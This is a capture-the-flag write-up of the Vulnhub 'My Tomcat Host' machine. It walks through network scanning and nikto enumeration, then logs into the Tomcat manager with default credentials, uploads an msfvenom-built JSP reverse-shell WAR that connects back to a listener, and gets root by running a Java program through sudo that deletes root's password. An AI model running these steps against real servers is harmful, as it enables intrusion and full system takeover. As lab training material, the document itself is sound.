577, Gold Plaza, Punjab Jewellers, M.G. Road, Opp. Treasure Island Mall

My Tomcat Host Vulnhub Walkthrough

Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a quick walkthrough of a vulnhub machine, My tomcat host. You can find this box on Infosec Warrior. According to there author it is a medium or intermediate level machine with good privilege escalation. So here we go.

My Tomcat Host: 1 walkthrough

Methodology applied :

Network Scanning
  • netdiscover
  • Nmap
Enumeration
  • Nmap
  • nikto
  • msfvenom
Privilege escalation
  • JAVA
  • sudo -l

Network Scanning

For scanning the network and obtaining the IP address of the box I used netdiscover.  As shown below

#netdiscover -i vboxnet0
	Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts                                                                                      
	2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102               
	_____________________________________________________________________________
	  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
	-----------------------------------------------------------------------------
	192.168.2.2     08:00:27:a8:2f:81      1      42  PCS Systemtechnik GmbH      
	192.168.2.15    08:00:27:f7:24:84      1      60  PCS Systemtechnik GmbH

So the IP of the box is 192.168.2.15.  let’s start with Nmap scanning

 

#nmap -p- -A -O  192.168.2.15
	Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-09 09:52 IST
	Nmap scan report for 192.168.2.15
	Host is up (0.00044s latency).
	Not shown: 65533 filtered ports
	PORT     STATE SERVICE VERSION
	22/tcp   open  ssh     OpenSSH 6.6.1 (protocol 2.0)
	| ssh-hostkey: 
	|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
	|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
	|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
	8080/tcp open  http    Apache Tomcat 9.0.31
	|_http-favicon: Apache Tomcat
	|_http-title: Apache Tomcat/9.0.31
	MAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
	Network Distance: 1 hop
	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.44 ms 192.168.2.15

Enumeration :

We can see that there is an open port number 8080. So let us have a look there

 

Good there a Tomcat Host on the box. For more information, I fired nikto.

#nikto -h http://192.168.2.15:8080
	
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.2.15
	+ Target Hostname:    192.168.2.15
	+ Target Port:        8080
	+ Start Time:         2020-04-09 09:54:21 (GMT5.5)
	---------------------------------------------------------------------------
	+ Server: No banner retrieved
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
	+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
	+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
	+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
	+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
	+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.
	+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
	+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
	+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
	+ /axis2/services/Version/getVersion: Apache Axis2 version identified.
	+ /axis2/services/listServices: Apache Axis2 WebServices identified.
	+ /axis2/axis2-web/index.jsp: Apache Axis2 Web Application identified.
	+ /host-manager/status: Default Tomcat Server Status interface found
	+ /manager/status: Tomcat Server Status interface found (pass protected)
	+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host
	+ End Time:           2020-04-09 09:55:13 (GMT5.5) (52 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Out of all the things, the most important to us is that we have credentials for tomcat manager application, tomcat: tomcat. and the directory /manager/html  page .

We were in the host and found there is a .war file upload option. So without wasting time I use msfvenom to generate a shell.war file

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war
	
	Payload size: 1106 bytes
	The final size of war file: 1106 bytes

Where LHOST = listener host IP  && LPORT = listener port

And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on the browser while having the listener on, on our machine

#nc -nlvp 1505
	
	listening on [any] 1505 ...
 	connect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094
	id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	hostname
	my_tomcat
	whoami
	tomcat

Got the shell of the user tomcat

Privilege Escalation:

Firstly I converted the shell into the interactive shell and I checked them for permissions on sudo command :

sh-4.2$ id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	sh-4.2$ sudo -l
	Matching Defaults entries for tomcat on this host:
	    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
	    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
	    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
	    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
	    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
	    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
	    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

	User tomcat may run the following commands on this host:
	    (ALL) NOPASSWD:
	    /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

I see that we can run java command with sudo privileges. You can find the program from any place, I got it on stack overflow.

import java.io.BufferedReader;
	import java.io.InputStreamReader;

	public class armour {  //you have to change thew class same as file name
	    public static void main(String args[]) {
	        String s;
	        Process p;
	        try {
	            p = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute
	            BufferedReader br = new BufferedReader(
	                new InputStreamReader(p.getInputStream()));
	            while ((s = br.readLine()) != null)
	                System.out.println("line: " + s);
	            p.waitFor();
	            System.out.println ("exit: " + p.exitValue());
	            p.destroy();
	        } catch (Exception e) {}
	    }
	}

now I compile the code and executed it.

bash-4.2$ javac armour.java
	bash-4.2$ sudo java armour
	line: Removing password for user root.
	line: passwd: Success
	exit: 0
	bash-4.2$ su root
	[[email protected]_tomcat tmp]# id 
	uid=0(root) gid=0(root) groups=0(root)
	[[email protected]_tomcat tmp]# hostname 
	my_tomcat
	[[email protected]_tomcat tmp]# whoami 
	root
	[[email protected]_tomcat tmp]# uname -a
	Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
	[[email protected]_tomcat tmp]# cd /root/
	[[email protected]_tomcat ~]# ls
	proof.txt
	[[email protected]_tomcat ~]# cat proof.txt 
	Best of Luck
	628435356e49f976bab2c04948d22fe4
	[[email protected]_tomcat ~]#

Boom !!! Eureka !!! I Got root …… and here is the flag.

 

Related Posts

Leave a comment

WhatsApp us